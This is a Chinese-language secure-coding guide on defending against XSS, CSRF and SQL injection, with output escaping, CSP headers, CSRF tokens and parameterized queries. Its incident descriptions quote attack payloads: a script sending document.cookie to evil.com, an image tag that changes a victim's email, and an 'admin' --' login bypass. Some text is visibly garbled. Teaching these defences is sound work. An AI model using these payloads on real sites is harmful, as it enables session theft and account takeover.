???? 面向开发者 · 深度技术干货

        ⚡ 真实案例 · 代码级防御

        ???? 事件： 某UGC社区评论区未过滤用户输入，攻击者提交 <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>，当管理员后台查看评论时，会话令牌被发送至攻击者服务器，导致后台被入侵。

// ❌ 危险：直接拼接HTML

element.innerHTML = userComment;

// ✅ 安全：文本内容转义 (前端 React  Vue 默认转义)

element.textContent = userComment;

// 后端 (Java) 使用 OWASP Java Encoder

// <%= Encode.forHtml(userComment) %>

// 属性转义 (例如拼接在 href 内)

// <a href='<%= Encode.forHtmlAttribute(userInput) %>'> ... </a>

// JavaScript 变量输出 (后端渲染)

// <script> var name = '<%= Encode.forJavaScript(userInput) %>'; </script>

# 仅允许同源脚本，拒绝内联脚本和eval

Content-Security-Policy: default-src 'self'; script-src 'self';

# 更严格：上报违规行为

Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-report

        ⚡ 快速自检： 检查所有动态输出是否使用了合适的编码函数（HTML、JS、CSS、URL）。Vue/React 默认转义，但 或 是危险信号。

        ???? 事件： 某邮箱服务商修改绑定邮箱接口为 GET 请求且仅依赖Cookie。攻击者在论坛植入图片 <img src='https://mail.com/user/change-email?email=attacker@evil.com'>，登录用户访问即自动修改绑定邮箱，导致账户被接管。

<!-- 服务端生成令牌并存入session -->

<?php

    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));

?>

<form method='POST' action='/update-profile'>

    <input type='hidden' name='csrf_token' value='<?= $_SESSION['csrf_token'] ?>'>

    <!-- 其他字段 -->

</form>

// 后端验证 (Node.js Express 示例)

app.post('/update-profile', (req, res) => {

    if (req.body.csrf_token !== req.session.csrf_token) {

        return res.status(403).send('CSRF 攻击拦截');

    }

    // 处理请求...

});

Set-Cookie: sessionid=abc123; SameSite=Lax; Secure; HttpOnly

# SameSite=Strict 完全禁止跨站发送 (但影响部分导航)

# SameSite=Lax 允许顶级导航 (推荐，平衡安全与体验)

        ???? 现代框架（如Spring Security、Django、Laravel）已内置CSRF防护，确保开启；前后端分离建议使用双重token或SameSite。

        ???? 事件： 某后台登录代码拼接 SELECT * FROM users WHERE username = '$username' AND password = '$password'，攻击者输入用户名 admin' -- 和任意密码，SQL变成 SELECT ... WHERE username = 'admin' -- ' AND password = 'xxx'，直接登录管理员账户。

// Java (JDBC)

PreparedStatement ps = conn.prepareStatement('SELECT * FROM users WHERE username = ?');

ps.setString(1, username);

ResultSet rs = ps.executeQuery();

// Python (sqlite3)

cursor.execute('SELECT * FROM users WHERE username = ?', (username,))

// Node.js (mysql2) 使用 ? 占位符

connection.execute('SELECT * FROM users WHERE username = ?', [username]);

// PHP (PDO)

$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ?');

$stmt->execute([$username]);

# 危险 ❌

$sql = 'SELECT * FROM users WHERE id = ' . $_GET['id'];

# 相对安全 (但远不如参数化)

$id = $mysqli->real_escape_string($_GET['id']);

$sql = 'SELECT * FROM users WHERE id = '$id'';

        ???? 记住：任何字符串拼接 + SQL关键字 = 迟早被注入。使用ORM时也要注意原生查询占位符。

        ⚙️ 安全不是功能，而是编码的底色。将以上规范固化到团队开发流水线、代码审查和脚手架中，才能有效降低漏洞风险。


        —— 本文由安全开发者撰写，遵循 OWASP 最佳实践。